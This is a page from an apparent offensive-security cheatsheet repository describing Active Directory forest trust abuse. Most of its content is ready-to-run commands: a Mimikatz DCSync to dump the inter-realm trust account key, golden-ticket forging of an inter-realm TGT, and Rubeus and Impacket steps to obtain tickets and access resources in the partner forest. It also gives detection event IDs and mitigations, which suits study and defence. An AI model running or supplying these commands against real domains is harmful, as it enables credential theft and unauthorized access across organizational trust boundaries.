daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-69-forest-trust-abuse-cross-forest-ticket-forging.md (3918B)


      1 ---
      2 title: "Attack #69 β€” Forest Trust Abuse Cross-Forest Ticket Forging"
      3 description: "When two forests have a forest trust, users from one forest can access resources in the other (if explicitly permitted). An attacker who compromises the…"
      4 category: active-directory
      5 subcategory: "Trust Abuse"
      6 tags: ["active-directory", "kerberos", "credential-access", "hashing"]
      7 tools: ["Impacket", "Mimikatz", "Rubeus", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/πŸ”Ά Attack #69 β€” Forest Trust Abuse Cross-Forest Ticket Forging.md"
     11 ---
     12 # πŸ”Ά Attack #69 β€” Forest Trust Abuse / Cross-Forest Ticket Forging
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 When two forests have a **forest trust**, users from one forest can access resources in the other (if explicitly permitted). An attacker who compromises the **inter-realm trust key** (the password of the `FOREST2$` trust account) can forge inter-realm TGTs to access the trusted forest. Unlike intra-forest trusts, **SID filtering IS enforced** on forest trusts β€” so the ExtraSids trick from Attack #68 won't work. Instead, the attacker must target **shared/delegated groups** that have been granted access across the trust.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **KRBTGT hash (your domain)** | Or the inter-realm trust key |
     27 | **Trust relationship exists** | Bidirectional or one-way forest trust |
     28 | **Shared groups / resources** | Foreign domain groups your SID matches |
     29 
     30 ***
     31 
     32 ## πŸ’» Full Commands
     33 
     34 ```powershell
     35 # ── Enumerate trust relationships ─────────────────────────────────────────────
     36 Get-ADTrust -Filter * | Select Name,Direction,TrustType,ForestTransitive
     37 
     38 # ── Dump inter-realm trust key ────────────────────────────────────────────────
     39 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:partner$" exit
     40 # partner$ = the trust account for partner.com forest trust
     41 
     42 # ── Forge inter-realm TGT ─────────────────────────────────────────────────────
     43 kerberos::golden /user:Administrator /domain:corp.local \
     44   /sid:S-1-5-21-<corp_SID> /rc4:<trust_key_hash> \
     45   /service:krbtgt /target:partner.com /ptt
     46 # This creates a referral ticket to the partner forest
     47 
     48 # ── Request TGS in the foreign forest ─────────────────────────────────────────
     49 .\Rubeus.exe asktgs /ticket:<inter-realm_TGT> \
     50   /service:cifs/PARTNER-DC.partner.com /dc:PARTNER-DC.partner.com /ptt
     51 ```
     52 
     53 ```bash
     54 # ── Impacket ──────────────────────────────────────────────────────────────────
     55 ticketer.py -nthash <trust_key_hash> \
     56   -domain-sid S-1-5-21-<corp_SID> \
     57   -domain corp.local \
     58   -spn krbtgt/partner.com \
     59   Administrator
     60 
     61 export KRB5CCNAME=Administrator.ccache
     62 # Then access permitted resources in partner.com
     63 ```
     64 
     65 ***
     66 
     67 ## πŸ›‘οΈ Detection β€” Event IDs
     68 
     69 | Event ID | Source | What to Look For |
     70 |---|---|---|
     71 | **4769** | Security Log (DC) | TGS request from external forest |
     72 | **4768** | Security Log (DC) | Inter-realm TGT referral |
     73 
     74 ***
     75 
     76 ## πŸ”— Attack Chain Context
     77 
     78 ```
     79 [Forest Trust Abuse] ──→ Cross-forest lateral movement via trust key
     80          β”‚
     81          β”œβ”€β”€β†’ ⚠️ SID filtering BLOCKS ExtraSids on forest trusts
     82          β”œβ”€β”€β†’ πŸ”— Must target groups explicitly shared across trust
     83          └──→ πŸ’€ Defeated by: selective authentication, minimize trust scope
     84 ```
     85 
     86 ***
     87 
     88 > βœ… **Attack #69 β€” Forest Trust Abuse complete.**